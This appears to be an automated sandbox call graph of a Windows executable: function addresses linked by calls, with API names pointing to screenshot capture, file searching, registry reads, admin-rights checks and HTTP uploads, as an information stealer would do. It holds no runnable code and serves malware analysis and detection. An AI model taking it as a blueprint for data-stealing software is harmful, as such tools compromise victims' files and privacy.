403798 21 API calls 18481->18482 18482->18481 18484 406829 18483->18484 18485 4034e4 7 API calls 18484->18485 18491 40683e 18485->18491 18486 4068ae 18487 403508 7 API calls 18486->18487 18488 4068c8 18487->18488 18490 4034e4 7 API calls 18488->18490 18489 4036cc 21 API calls 18489->18491 18493 4068d0 18490->18493 18491->18486 18491->18489 18492 4067e8 21 API calls 18491->18492 18494 403798 21 API calls 18491->18494 18495 403850 21 API calls 18491->18495 18492->18491 18496 4037dc 18493->18496 18494->18491 18495->18491 18497 4037e0 18496->18497 18504 403798 18496->18504 18498 403538 18497->18498 18500 4037f0 18497->18500 18501 4037fe 18497->18501 18497->18504 18502 4035a8 21 API calls 18498->18502 18508 40354c 18498->18508 18499 40357a 18499->18162 18505 403538 21 API calls 18500->18505 18506 4035a8 21 API calls 18501->18506 18502->18508 18503 4037db 18503->18162 18504->18498 18504->18503 18509 4037a6 18504->18509 18505->18504 18507 403811 18506->18507 18516 403538 21 API calls 18507->18516 18508->18499 18512 402550 7 API calls 18508->18512 18510 4037d0 18509->18510 18511 4037b9 18509->18511 18513 403ac0 21 API calls 18510->18513 18514 403ac0 21 API calls 18511->18514 18512->18499 18515 4037be 18513->18515 18514->18515 18515->18162 18517 40383d 18516->18517 18517->18162 18520 4176f1 18518->18520 18519 417759 18522 4034e4 7 API calls 18519->18522 18520->18519 19300 4039e8 18520->19300 18523 41776e 18522->18523 18524 418688 18523->18524 18525 418691 18524->18525 18526 4186e7 18525->18526 18527 40357c 7 API calls 18525->18527 18528 4034e4 7 API calls 18526->18528 18527->18526 18529 4186ef 18528->18529 18530 40357c 7 API calls 18529->18530 18531 4186fa 18530->18531 18532 40357c 7 API calls 18531->18532 18533 41870b 18532->18533 18534 4039e8 21 API calls 18533->18534 18535 418713 GetModuleHandleA 18534->18535 18536 41872f 18535->18536 18537 41871f 18535->18537 18539 418733 18536->18539 18540 41874f 18536->18540 18538 4039e8 21 API calls 18537->18538 18541 418727 LoadLibraryA 18538->18541 18542 4039e8 21 API calls 18539->18542 18543 4039e8 21 API calls 18540->18543 18541->18536 18544 41873b 18542->18544 18545 418757 GetProcAddress 18543->18545 18546 4039e8 21 API calls 18544->18546 18547 4039e8 21 API calls 18545->18547 18549 418747 LoadLibraryA 18546->18549 18548 41876c GetProcAddress 18547->18548 18550 4039e8 21 API calls 18548->18550 18549->18540 18551 418781 GetProcAddress 18550->18551 18552 4039e8 21 API calls 18551->18552 18553 418796 GetProcAddress 18552->18553 18554 4039e8 21 API calls 18553->18554 18555 4187ab GetProcAddress 18554->18555 18556 4039e8 21 API calls 18555->18556 18557 4187c0 GetProcAddress 18556->18557 18558 4039e8 21 API calls 18557->18558 18559 4187d5 GetProcAddress 18558->18559 18560 4039e8 21 API calls 18559->18560 18561 4187e9 GetProcAddress 18560->18561 18562 4039e8 21 API calls 18561->18562 18563 418800 GetProcAddress 18562->18563 18564 41881c 18563->18564 18565 4188f2 InternetCrackUrlA 18564->18565 18566 418901 18565->18566 19306 4039f0 18566->19306 18568 418977 InternetOpenA 18570 418991 InternetConnectA 18568->18570 18578 418ad6 18568->18578 18569 418922 18569->18568 18571 4037dc 21 API calls 18569->18571 18570->18578 18587 4189d4 18570->18587 18573 41895b 18571->18573 18572 418b28 18574 403538 21 API calls 18572->18574 19313 417f6c 18573->19313 18577 418b33 18574->18577 18580 4034e4 7 API calls 18577->18580 18578->18572 18582 418ae5 18578->18582 18579 418969 18579->18568 18581 418b3b 18580->18581 18584 403508 7 API calls 18581->18584 19334 418124 18582->19334 18585 418b58 18584->18585 18586 403508 7 API calls 18585->18586 18589 418b65 18586->18589 18588 418a1c HttpOpenRequestA 18587->18588 18590 418ad0 InternetCloseHandle 18588->18590 18595 418a31 18588->18595 18591 403508 7 API calls 18589->18591 18590->18578 18592 418b72 18591->18592 18593 403508 7 API calls 18592->18593 18594 418b7f 18593->18594 18594->18171 18596 418a66 HttpSendRequestA 18595->18596 18596->18590 18599 418a79 18596->18599 18597 418a89 InternetReadFile 18598 4035d4 21 API calls 18597->18598 18598->18599 18599->18590 18599->18597 18600 403798 21 API calls 18599->18600 18600->18599 18602 407444 18601->18602 18603 4034e4 7 API calls 18602->18603 18607 407469 18603->18607 18604 4074d3 18605 403508 7 API calls 18604->18605 18606 4074ed 18605->18606 18611 406984 18606->18611 18607->18604 18608 4039f0 21 API calls 18607->18608 18609 4074b1 18608->18609 18609->18604 18610 4039f0 21 API calls 18609->18610 18610->18604 18612 4069a3 18611->18612 18613 4034e4 7 API calls 18612->18613 18620 4069b9 18613->18620 18614 406a64 18615 403508 7 API calls 18614->18615 18616 406a7e 18615->18616 18617 4034e4 7 API calls 18616->18617 18618 406a86 18617->18618 18618->18190 18619 4036cc 21 API calls 18619->18620 18620->18614 18620->18619 18621 403798 21 API calls 18620->18621 18621->18620 18623 406b00 18622->18623 18624 40357c 7 API calls 18623->18624 18629 406b1b 18624->18629 18625 406b6b 18626 403538 21 API calls 18625->18626 18627 406b76 18626->18627 18630 4034e4 7 API calls 18627->18630 18628 4039e8 21 API calls 18628->18629 18629->18625 18629->18628 18631 406b8b 18630->18631 18632 4034e4 7 API calls 18631->18632 18633 406b93 18632->18633 18634 40795c 18633->18634 18635 4047a8 26 API calls 18634->18635 18639 40797e 18635->18639 18636 4079df 18637 4047a8 26 API calls 18636->18637 18640 4079fa 18637->18640 18638 4047a8 26 API calls 18638->18639 18639->18636 18639->18638 18641 4039f0 21 API calls 18639->18641 18642 4039f0 21 API calls 18640->18642 18641->18639 18643 407a20 18642->18643 18643->18201 18645 4080d3 18644->18645 18646 40795c 26 API calls 18645->18646 18647 4080f3 18646->18647 18648 4034e4 7 API calls 18647->18648 18649 408108 18648->18649 18650 408328 18649->18650 18651 408330 18650->18651 18651->18651 18652 406c4c 35 API calls 18651->18652 18653 40836d 18652->18653 18654 406258 21 API calls 18653->18654 18655 408378 18654->18655 18656 406258 21 API calls 18655->18656 18657 408383 18656->18657 18658 403e1c 3 API calls 18657->18658 18659 4083a8 18658->18659 19513 4062d8 18659->19513 18662 403bbc 3 API calls 18663 4083bd 18662->18663 18664 4083c6 CreateDirectoryW 18663->18664 19518 4081a0 18664->19518 18666 4083d6 19537 403db8 18666->19537 18671 408444 18679 408466 18671->18679 19550 4040b0 18671->19550 18672 4083fc 18673 403e1c 3 API calls 18672->18673 18674 408416 18673->18674 18675 4062d8 3 API calls 18674->18675 18678 408421 18675->18678 18677 403e1c 3 API calls 18683 408495 18677->18683 18680 403bbc 3 API calls 18678->18680 18679->18677 18681 40842b 18680->18681 18682 408434 CreateDirectoryW 18681->18682 18684 4081a0 33 API calls 18682->18684 18685 4084b3 SetCurrentDirectoryW 18683->18685 18684->18671 18686 4084ce 18685->18686 18687 403db8 3 API calls 18686->18687 18688 4084db 18687->18688 18689 4084e3 LoadLibraryExW 18688->18689 18690 4084f4 18689->18690 18691 408737 18689->18691 18692 408120 21 API calls 18690->18692 18693 403508 7 API calls 18691->18693 18694 408501 18692->18694 18695 408751 18693->18695 18696 408509 GetProcAddress 18694->18696 18697 403b98 SysFreeString 18695->18697 18698 408120 21 API calls 18696->18698 18699 40875e 18697->18699 18700 408524 18698->18700 18701 403508 7 API calls 18699->18701 18703 40852c GetProcAddress 18700->18703 18702 40876b 18701->18702 18704 403b98 SysFreeString 18702->18704 18705 408120 21 API calls 18703->18705 18706 408778 18704->18706 18707 408547 18705->18707 18708 4034e4 7 API calls 18706->18708 18710 40854f GetProcAddress 18707->18710 18709 408780 18708->18709 18709->18290 18711 408120 21 API calls 18710->18711 18712 40856a 18711->18712 18713 408572 GetProcAddress 18712->18713 18714 408120 21 API calls 18713->18714 18715 40858d 18714->18715 18716 408595 GetProcAddress 18715->18716 18717 408120 21 API calls 18716->18717 18718 4085b0 18717->18718 18719 4085b8 GetProcAddress 18718->18719 18720 408120 21 API calls 18719->18720 18721 4085d3 18720->18721 18722 4085db GetProcAddress 18721->18722 18723 408120 21 API calls 18722->18723 18724 4085f6 18723->18724 18725 4085fe GetProcAddress 18724->18725 18726 408120 21 API calls 18725->18726 18727 408619 18726->18727 18728 408621 GetProcAddress 18727->18728 18729 408120 21 API calls 18728->18729 18730 40863c 18729->18730 18731 408644 GetProcAddress 18730->18731 18732 408120 21 API calls 18731->18732 18733 40865f 18732->18733 18734 408667 GetProcAddress 18733->18734 18735 408120 21 API calls 18734->18735 18736 408682 18735->18736 18737 40868a GetProcAddress 18736->18737 18738 408120 21 API calls 18737->18738 18739 4086a5 18738->18739 18740 4086ad GetProcAddress 18739->18740 18740->18691 18741 4086c4 18740->18741 18741->18691 19568 409208 18742->19568 18764 4035d4 21 API calls 18763->18764 18765 4036d9 18764->18765 18765->18148 18768 4053e8 18766->18768 18767 4054b7 18767->18290 18768->18767 18769 403850 21 API calls 18768->18769 18769->18768 20637 40f944 18770->20637 18780 408136 18779->18780 18781 403538 21 API calls 18779->18781 18780->18290 18781->18780 18783 4034e4 7 API calls 18782->18783 18784 405534 18783->18784 18785 405567 18784->18785 18786 403850 21 API calls 18784->18786 18785->18290 18786->18784 21557 4132e0 18787->21557 18791 4040f4 SysAllocStringLen 18790->18791 18792 415eb7 18791->18792 21875 415610 18792->21875 18800 4050de 18799->18800 22064 40503c 18800->22064 18803 403850 21 API calls 18804 405114 18803->18804 18805 403508 7 API calls 18804->18805 18806 40512e 18805->18806 18806->18290 18808 4040f4 SysAllocStringLen 18807->18808 18809 414d03 18808->18809 18810 4062d8 3 API calls 18809->18810 18811 414d24 18810->18811 18812 403db8 3 API calls 18811->18812 18819 414d38 18812->18819 18813 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 18813->18819 18814 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 18814->18819 18815 4076b0 3 API calls 18815->18819 18816 414e45 18817 403b98 SysFreeString 18816->18817 18818 414e6c 18817->18818 18820 4034e4 7 API calls 18818->18820 18819->18813 18819->18814 18819->18815 18819->18816 18823 40ddb0 30 API calls 18819->18823 18821 414e77 18820->18821 18822 403b98 SysFreeString 18821->18822 18824 414e87 18822->18824 18823->18819 18825 403b98 SysFreeString 18824->18825 18826 414e94 18825->18826 18826->18290 18828 414411 18827->18828 18828->18828 18829 4040f4 SysAllocStringLen 18828->18829 18830 41442f 18829->18830 18831 4040f4 SysAllocStringLen 18830->18831 18832 414437 18831->18832 18833 4040f4 SysAllocStringLen 18832->18833 18834 41443f 18833->18834 18835 4040f4 SysAllocStringLen 18834->18835 18836 414447 18835->18836 18837 4062d8 3 API calls 18836->18837 18838 414468 18837->18838 18839 40795c 26 API calls 18838->18839 18840 414497 18839->18840 18841 40795c 26 API calls 18840->18841 18843 4144b8 18841->18843 18842 414538 18844 403b98 SysFreeString 18842->18844 18843->18842 18847 4047a8 26 API calls 18843->18847 18845 414af6 18844->18845 18846 403508 7 API calls 18845->18846 18848 414b06 18846->18848 18849 4144e5 18847->18849 18850 403b80 SysFreeString 18848->18850 18853 40781c 8 API calls 18849->18853 18851 414b11 18850->18851 18852 403508 7 API calls 18851->18852 18854 414b21 18852->18854 18855 414506 18853->18855 18857 403b98 SysFreeString 18854->18857 18856 403bbc 3 API calls 18855->18856 18882 414512 18856->18882 18858 414b31 18857->18858 18859 4034e4 7 API calls 18858->18859 18860 414b3c 18859->18860 18861 403b98 SysFreeString 18860->18861 18862 414b4c 18861->18862 18863 403508 7 API calls 18862->18863 18864 414b5c 18863->18864 18865 403b98 SysFreeString 18864->18865 18866 414b6c 18865->18866 18867 4034e4 7 API calls 18866->18867 18868 414b77 18867->18868 18869 403b80 SysFreeString 18868->18869 18870 414b82 18869->18870 18872 4034e4 7 API calls 18870->18872 18871 403b80 SysFreeString 18871->18882 18873 414b8d 18872->18873 18874 403b98 SysFreeString 18873->18874 18875 414b9d 18874->18875 18876 403508 7 API calls 18875->18876 18877 414bad 18876->18877 18879 403b80 SysFreeString 18877->18879 18878 403db8 3 API calls 18878->18882 18880 414bb8 18879->18880 18881 4047b4 9 API calls 18880->18881 18883 414bc6 18881->18883 18882->18842 18882->18871 18882->18878 18885 4145c4 FindFirstFileW 18882->18885 18897 414aae FindNextFileW 18882->18897 18899 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 18882->18899 18901 4149b1 GetFileAttributesW 18882->18901 18902 403f34 SysAllocStringLen SysAllocStringLen SysFreeString 18882->18902 18903 406120 21 API calls 18882->18903 18904 4047a8 26 API calls 18882->18904 18905 403bbc 3 API calls 18882->18905 18906 40ddb0 30 API calls 18882->18906 18907 406318 21 API calls 18882->18907 18908 40770c 6 API calls 18882->18908 18909 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 18882->18909 18910 40781c 8 API calls 18882->18910 22072 4141b8 18882->22072 18884 403b80 SysFreeString 18883->18884 18886 414bce 18884->18886 18885->18882 18887 4047b4 9 API calls 18886->18887 18888 414bdc 18887->18888 18889 403b98 SysFreeString 18888->18889 18890 414be9 18889->18890 18891 4047b4 9 API calls 18890->18891 18892 414bf7 18891->18892 18897->18882 18898 414ac3 FindClose 18897->18898 18898->18882 18899->18882 18901->18882 18901->18897 18902->18882 18903->18882 18904->18882 18905->18897 18906->18882 18907->18882 18908->18882 18909->18882 18910->18882 18912 414f48 18911->18912 18912->18912 18913 4040f4 SysAllocStringLen 18912->18913 18914 414f5e 18913->18914 18915 407500 9 API calls 18914->18915 18916 414f92 18915->18916 22131 4070bc 18916->22131 18918 414fab 18919 403db8 3 API calls 18918->18919 18922 414fcd 18919->18922 18920 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 18920->18922 18921 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 18921->18922 18922->18920 18922->18921 18923 40ddb0 30 API calls 18922->18923 18924 415078 18922->18924 18923->18922 18925 403db8 3 API calls 18924->18925 18927 415096 18925->18927 18926 403d10 SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 18926->18927 18927->18926 18928 403e1c SysAllocStringLen SysAllocStringLen SysFreeString 18927->18928 18929 40ddb0 30 API calls 18927->18929 18930 415141 18927->18930 18928->18927 18929->18927 18931 403b98 SysFreeString 18930->18931 18932 415168 18931->18932 18933 4034e4 7 API calls 18932->18933 18934 415173 18933->18934 18935 403b98 SysFreeString 18934->18935 18936 415183 18935->18936 18937 4034e4 7 API calls 18936->18937 18938 41518e 18937->18938 18939 403b98 SysFreeString 18938->18939 18940 41519e 18939->18940 18941 403b98 SysFreeString 18940->18941 18942 4151ab 18941->18942 18942->18290 18944 417ac5 18943->18944 18945 4178e9 18943->18945 18944->18290 18945->18944 18946 417992 GetDC CreateCompatibleDC CreateCompatibleBitmap SelectObject BitBlt 18945->18946 18947 404900 18946->18947 18948 4179e3 CreateStreamOnHGlobal 18947->18948 18949 4179fb 18948->18949 22151 4177e0 18949->22151 18953 4035d4 21 API calls 18954 417a94 GlobalUnWire DeleteObject DeleteDC ReleaseDC 18953->18954 18954->18944 18957 40700b 18956->18957 18958 403bbc 3 API calls 18957->18958 18959 407023 18958->18959 18960 403b80 SysFreeString 18959->18960 18961 407038 18960->18961 18961->18290 18968 403be8 18962->18968 18963 403c01 18965 403b80 SysFreeString 18963->18965 18964 403c0a 18966 403c3d 18964->18966 22157 403624 MultiByteToWideChar 18964->22157 18967 403c08 18965->18967 18969 4040b0 3 API calls 18966->18969 18967->18341 18968->18963 18968->18964 18972 403c48 18969->18972 18971 403c28 18971->18966 18973 403c2e 18971->18973 22158 403624 MultiByteToWideChar 18972->22158 18975 403c74 4 API calls 18973->18975 18975->18967 18976 403c56 18976->18967 18977 4040b0 3 API calls 18976->18977 18977->18967 18980 403d69 18978->18980 18979 403db1 18979->18341 18980->18979 18981 403b58 2 API calls 18980->18981 18982 403d83 18981->18982 18983 403b70 SysFreeString 18982->18983 18983->18979 18985 4040f4 SysAllocStringLen 18984->18985 18986 407833 18985->18986 18987 403bbc 3 API calls 18986->18987 18988 40784b 18987->18988 18989 4070bc 8 API calls 18988->18989 18990 407860 18989->18990 18991 403bbc 3 API calls 18990->18991 18992 40786a 18991->18992 18993 4070bc 8 API calls 18992->18993 18994 40787f 18993->18994 18995 403bbc 3 API calls 18994->18995 18996 407889 18995->18996 18997 4070bc 8 API calls 18996->18997 18998 40789b 18997->18998 18999 403bbc 3 API calls 18998->18999 19000 4078a5 18999->19000 19001 403b98 SysFreeString 19000->19001 19002 4078bf 19001->19002 19002->18341 19004 417298 19003->19004 19004->19004 19005 406c4c 35 API calls 19004->19005 19006 4172bd 19005->19006 19007 403850 21 API calls 19006->19007 19008 4172d1 19007->19008 22159 416f88 GetModuleFileNameA 19008->22159 19010 4172e2 19011 403850 21 API calls 19010->19011 19012 4172f6 19011->19012 22161 407a4c 19012->22161 19015 403850 21 API calls 19016 41731a 19015->19016 22183 4066c0 19016->22183 19019 406bb4 9 API calls 19020 417340 19019->19020 19021 403e1c 3 API calls 19020->19021 19022 417355 19021->19022 19023 4037dc 21 API calls 19022->19023 19024 41736e 19023->19024 19025 406610 6 API calls 19024->19025 19026 417384 19025->19026 19027 4065cc 6 API calls 19026->19027 19028 417394 19027->19028 19029 403e1c 3 API calls 19028->19029 19030 4173ae 19029->19030 19031 4037dc 21 API calls 19030->19031 19032 4173c7 19031->19032 19033 4173d2 GetSystemMetrics 19032->19033 19034 406fdc 4 API calls 19033->19034 19035 4173e4 GetSystemMetrics 19034->19035 19036 406fdc 4 API calls 19035->19036 19037 4173fb 19036->19037 19094 403b9e 19093->19094 19095 403ba4 SysFreeString 19094->19095 19096 403bb6 19094->19096 19095->19094 19096->18146 19099 40350e 19097->19099 19098 403534 19101 403b80 19098->19101 19099->19098 19100 402550 7 API calls 19099->19100 19100->19099 19102 403b94 19101->19102 19103 403b86 SysFreeString 19101->19103 19102->18163 19103->19102 19105 40422d 19104->19105 19124 404262 19104->19124 19106 404242 19105->19106 19107 404267 19105->19107 19108 404284 19106->19108 19109 404246 19106->19109 19110 404278 19107->19110 19111 40426e 19107->19111 19112 404292 19108->19112 19113 40428b 19108->19113 19114 40424a 19109->19114 19115 40429b 19109->19115 19117 403508 7 API calls 19110->19117 19116 4034e4 7 API calls 19111->19116 19119 403b98 SysFreeString 19112->19119 19118 403b80 SysFreeString 19113->19118 19120 4042aa 19114->19120 19121 40424e 19114->19121 19115->19124 22399 40420c 19115->22399 19116->19124 19117->19124 19118->19124 19119->19124 19120->19124 19125 404224 9 API calls 19120->19125 19123 4042c8 19121->19123 19128 404252 19121->19128 19123->19124 22404 4041d8 19123->22404 19124->18272 19125->19120 19127 4047b4 9 API calls 19127->19128 19128->19124 19128->19127 19130 402555 19129->19130 19131 402568 19129->19131 19130->19131 19133 402614 19130->19133 19131->18398 19134 4025cc 19133->19134 19137 4025c0 19134->19137 19140 4034cc 19137->19140 19141 4033f4 7 API calls 19140->19141 19142 4025cb 19141->19142 19142->19131 19144 40353c 19143->19144 19147 40354c 19143->19147 19144->19147 19160 4035a8 19144->19160 19145 40357a 19149 407b78 19145->19149 19147->19145 19148 402550 7 API calls 19147->19148 19148->19145 19150 407bb7 19149->19150 19151 407c08 CheckTokenMembership 19150->19151 19152 407c1f FreeSid 19150->19152 19151->19152 19152->18408 19155 407c9e 19154->19155 19156 407ca4 LookupAccountSidA CheckTokenMembership 19155->19156 19157 407d1d 19155->19157 19158 407cf2 FreeSid 19156->19158 19157->18420 19158->18420 19161 4035d0 19160->19161 19162 4035ac 19160->19162 19161->19147 19165 402530 19162->19165 19166 402535 19165->19166 19167 402548 19165->19167 19171 401f5c 19166->19171 19167->19147 19168 40253b 19168->19167 19169 402614 7 API calls 19168->19169 19169->19167 19172 401f70 19171->19172 19173 401f75 19171->19173 19174 401870 4 API calls 19172->19174 19175 401fa2 RtlEnterCriticalSection 19173->19175 19176 401fac 19173->19176 19181 401f81 19173->19181 19174->19173 19175->19176 19176->19181 19182 401e68 19176->19182 19179 4020d7 19179->19168 19180 4020cd RtlLeaveCriticalSection 19180->19179 19181->19168 19185 401e78 19182->19185 19183 401ea4 19184 401c7c 9 API calls 19183->19184 19187 401ec8 19183->19187 19184->19187 19185->19183 19185->19187 19188 401ddc 19185->19188 19187->19179 19187->19180 19193 401630 19188->19193 19190 401dec 19191 401df9 19190->19191 19192 401d50 9 API calls 19190->19192 19191->19185 19192->19191 19194 40164c 19193->19194 19196 401656 19194->19196 19198 401284 LocalAlloc 19194->19198 19199 401662 19194->19199 19200 4016a7 19194->19200 19202 401388 19194->19202 19197 40151c VirtualAlloc 19196->19197 19197->19199 19198->19194 19199->19190 19201 401464 VirtualFree 19200->19201 19201->19199 19203 401397 VirtualAlloc 19202->19203 19205 4013c4 19203->19205 19206 4013e7 19203->19206 19207 40123c LocalAlloc 19205->19207 19206->19194 19208 4013d0 19207->19208 19208->19206 19209 4013d4 VirtualFree 19208->19209 19209->19206 19211 403b80 SysFreeString 19210->19211 19212 406e7f 19211->19212 19240 406dac 19212->19240 19268 407500 19215->19268 19219 406601 19218->19219 19220 4065ef 19218->19220 19221 4065ff 19219->19221 19222 403b80 SysFreeString 19219->19222 19223 403d10 4 API calls 19220->19223 19221->18440 19222->19221 19223->19221 19225 406633 19224->19225 19226 406645 19224->19226 19227 403d10 4 API calls 19225->19227 19228 403b80 SysFreeString 19226->19228 19229 406643 19227->19229 19228->19229 19229->18442 19231 40626a 19230->19231 19281 4061e0 19231->19281 19235 40628c 19236 4062a8 19235->19236 19237 4037dc 21 API calls 19235->19237 19238 4034e4 7 API calls 19236->19238 19237->19235 19239 4062bd 19238->19239 19239->18445 19241 406dc6 19240->19241 19242 4040f4 SysAllocStringLen 19240->19242 19252 4040f4 19241->19252 19242->19241 19244 406dce 19245 406dff RegOpenKeyExW 19244->19245 19256 403d3c 19245->19256 19249 406e44 19250 403b98 SysFreeString 19249->19250 19251 406e5e 19250->19251 19251->18429 19253 4040fa SysAllocStringLen 19252->19253 19255 404110 19252->19255 19254 403b50 19253->19254 19253->19255 19254->19252 19255->19244 19257 403d40 RegQueryValueExW 19256->19257 19258 403d10 19257->19258 19259 403c74 19258->19259 19260 403b80 19259->19260 19261 403c7c SysAllocStringLen 19259->19261 19262 403b94 19260->19262 19263 403b86 SysFreeString 19260->19263 19264 403b50 19261->19264 19265 403c8c SysFreeString 19261->19265 19262->19249 19263->19262 19266 404110 19264->19266 19267 4040fa SysAllocStringLen 19264->19267 19265->19249 19266->19249 19267->19264 19267->19266 19269 4040f4 SysAllocStringLen 19268->19269 19270 40751a 19269->19270 19271 4040f4 SysAllocStringLen 19270->19271 19272 407522 19271->19272 19273 407546 19272->19273 19274 407579 RegOpenKeyExW 19272->19274 19275 40759d RegQueryValueExW 19273->19275 19274->19273 19276 403d10 4 API calls 19275->19276 19277 4075be RegCloseKey 19276->19277 19278 4075d5 19277->19278 19279 403b98 SysFreeString 19278->19279 19280 406bce 19279->19280 19280->18434 19282 4061f1 19281->19282 19283 4034e4 7 API calls 19282->19283 19284 406249 19283->19284 19285 4067e8 19284->19285 19286 4067ed 19285->19286 19289 4035d4 19286->19289 19290 4035a8 21 API calls 19289->19290 19291 4035e4 19290->19291 19292 4034e4 7 API calls 19291->19292 19293 4035fc 19292->19293 19293->19235 19295 403acd 19294->19295 19299 403afd 19294->19299 19297 4035a8 21 API calls 19295->19297 19298 403ad9 19295->19298 19296 4034e4 7 API calls 19296->19298 19297->19299 19298->18471 19299->19296 19301 40399c 19300->19301 19302 4035a8 21 API calls 19301->19302 19303 4039d7 19301->19303 19304 4039b3 19302->19304 19303->18520 19304->19303 19305 402550 7 API calls 19304->19305 19305->19303 19307 403a22 19306->19307 19308 4039f5 19306->19308 19309 4034e4 7 API calls 19307->19309 19308->19307 19311 403a09 19308->19311 19310 403a18 19309->19310 19310->18569 19312 4035d4 21 API calls 19311->19312 19312->19310 19314 417f8b 19313->19314 19315 4034e4 7 API calls 19314->19315 19316 417fa1 19315->19316 19391 4047a8 19316->19391 19318 417fbc 19319 418088 19318->19319 19394 417e80 19318->19394 19320 4180b1 19319->19320 19321 41808c 19319->19321 19404 417dcc 19320->19404 19323 4037dc 21 API calls 19321->19323 19325 4180a0 19323->19325 19327 418688 60 API calls 19325->19327 19326 4180af 19328 4034e4 7 API calls 19326->19328 19327->19326 19329 4180d0 19328->19329 19417 4047b4 19329->19417 19332 4034e4 7 API calls 19333 4180e6 19332->19333 19333->18579 19335 41816c 19334->19335 19336 40357c 7 API calls 19335->19336 19337 4181a7 19336->19337 19338 4039e8 21 API calls 19337->19338 19339 4181af GetModuleHandleA 19338->19339 19340 4181cb 19339->19340 19341 4181bb 19339->19341 19342 4039e8 21 API calls 19340->19342 19343 4039e8 21 API calls 19341->19343 19344 4181d3 GetProcAddress 19342->19344 19345 4181c3 LoadLibraryA 19343->19345 19346 4039e8 21 API calls 19344->19346 19345->19340 19347 4181ea GetProcAddress 19346->19347 19348 4039e8 21 API calls 19347->19348 19349 418201 GetProcAddress 19348->19349 19350 4039e8 21 API calls 19349->19350 19351 418218 GetProcAddress 19350->19351 19352 4039e8 21 API calls 19351->19352 19353 41822f GetProcAddress 19352->19353 19354 4039e8 21 API calls 19353->19354 19355 418246 GetProcAddress 19354->19355 19356 4039e8 21 API calls 19355->19356 19357 41825d GetProcAddress 19356->19357 19358 4039e8 21 API calls 19357->19358 19359 418274 GetProcAddress 19358->19359 19360 4184e2 19359->19360 19368 41828b 19359->19368 19361 403b98 SysFreeString 19360->19361 19362 4184ff 19361->19362 19363 4034e4 7 API calls 19362->19363 19364 41850a 19363->19364 19365 403b98 SysFreeString 19364->19365 19366 41851a 19365->19366 19367 403508 7 API calls 19366->19367 19369 418527 19367->19369 19368->19360 19370 4034e4 7 API calls 19368->19370 19371 403508 7 API calls 19369->19371 19373 4182fb 19370->19373 19372 418534 19371->19372 19372->18572 19373->19360 19374 403850 21 API calls 19373->19374 19375 4183ce 19374->19375 19376 417d60 4 API calls 19375->19376 19377 4183f8 19376->19377 19378 403e1c 3 API calls 19377->19378 19379 418427 19378->19379 19380 4039e8 21 API calls 19379->19380 19381 418448 19380->19381 19382 4034e4 7 API calls 19381->19382 19385 418458 19382->19385 19383 4034e4 7 API calls 19383->19385 19384 4035d4 21 API calls 19384->19385 19385->19383 19385->19384 19386 403798 21 API calls 19385->19386 19387 4184a8 19385->19387 19386->19385 19388 4039f0 21 API calls 19387->19388 19389 4184d7 19388->19389 19390 403538 21 API calls 19389->19390 19390->19360 19423 40461c 19391->19423 19395 417e97 LoadLibraryA GetProcAddress 19394->19395 19490 403980 19394->19490 19397 417ec2 19395->19397 19403 417edd 19395->19403 19398 402530 21 API calls 19397->19398 19400 417ed1 19398->19400 19399 4034e4 7 API calls 19401 417f21 19399->19401 19402 402530 21 API calls 19400->19402 19401->19318 19402->19403 19403->19399 19492 417d60 19404->19492 19407 417d60 4 API calls 19408 417e0d 19407->19408 19409 417d60 4 API calls 19408->19409 19410 417e22 19409->19410 19411 417d60 4 API calls 19410->19411 19412 417e37 19411->19412 19498 403e1c 19412->19498 19419 4047ba 19417->19419 19422 4047ec 19417->19422 19418 4047e4 19420 402550 7 API calls 19418->19420 19419->19418 19421 404224 9 API calls 19419->19421 19419->19422 19420->19422 19421->19418 19422->19332 19424 40463b 19423->19424 19428 404655 19423->19428 19425 404646 19424->19425 19426 402614 7 API calls 19424->19426 19437 404614 19425->19437 19426->19425 19429 40469f 19428->19429 19430 402614 7 API calls 19428->19430 19431 4046ac 19429->19431 19432 402530 21 API calls 19429->19432 19430->19429 19434 404650 19431->19434 19436 40461c 26 API calls 19431->19436 19433 4046eb 19432->19433 19433->19431 19440 4045fc 19433->19440 19434->19318 19436->19431 19438 4047b4 9 API calls 19437->19438 19439 404619 19438->19439 19439->19434 19443 404444 19440->19443 19442 404607 19442->19431 19444 404459 19443->19444 19445 40447f 19443->19445 19446 4044a1 19444->19446 19447 40445e 19444->19447 19448 403538 21 API calls 19445->19448 19457 40449c 19445->19457 19446->19457 19462 403bbc 19446->19462 19449 404463 19447->19449 19450 4044b5 19447->19450 19448->19445 19453 404468 19449->19453 19454 4044c9 19449->19454 19450->19457 19472 404310 19450->19472 19455 4044ea 19453->19455 19456 40446d 19453->19456 19454->19457 19458 404444 26 API calls 19454->19458 19455->19457 19477 404328 19455->19477 19456->19445 19456->19457 19460 40451b 19456->19460 19457->19442 19458->19454 19460->19457 19486 4047f0 19460->19486 19463 403b80 19462->19463 19464 403bc4 19462->19464 19466 403b94 19463->19466 19467 403b86 SysFreeString 19463->19467 19464->19463 19465 403bcf SysReAllocStringLen 19464->19465 19468 403bdf 19465->19468 19469 403b50 19465->19469 19466->19446 19467->19466 19468->19446 19470 404110 19469->19470 19471 4040fa SysAllocStringLen 19469->19471 19470->19446 19471->19469 19471->19470 19473 404320 19472->19473 19474 404319 19472->19474 19475 402614 7 API calls 19473->19475 19474->19450 19476 404327 19475->19476 19476->19450 19481 404342 19477->19481 19478 403538 21 API calls 19478->19481 19479 403bbc 3 API calls 19479->19481 19480 404310 7 API calls 19480->19481 19481->19478 19481->19479 19481->19480 19482 40442e 19481->19482 19483 404444 26 API calls 19481->19483 19484 404328 26 API calls 19481->19484 19485 4047f0 9 API calls 19481->19485 19482->19455 19483->19481 19484->19481 19485->19481 19487 4047f7 19486->19487 19488 4047b4 9 API calls 19487->19488 19489 404811 19487->19489 19488->19489 19489->19460 19491 403984 19490->19491 19491->19395 19493 417d8f 19492->19493 19494 403bbc 3 API calls 19493->19494 19495 417da7 19494->19495 19496 403b80 SysFreeString 19495->19496 19497 417dbc 19496->19497 19497->19407 19499 403e24 19498->19499 19504 403b58 19499->19504 19501 403e39 19510 403b70 19501->19510 19505 403b6c 19504->19505 19506 403b5c SysAllocStringLen 19504->19506 19505->19501 19506->19505 19507 403b50 19506->19507 19508 404110 19507->19508 19509 4040fa 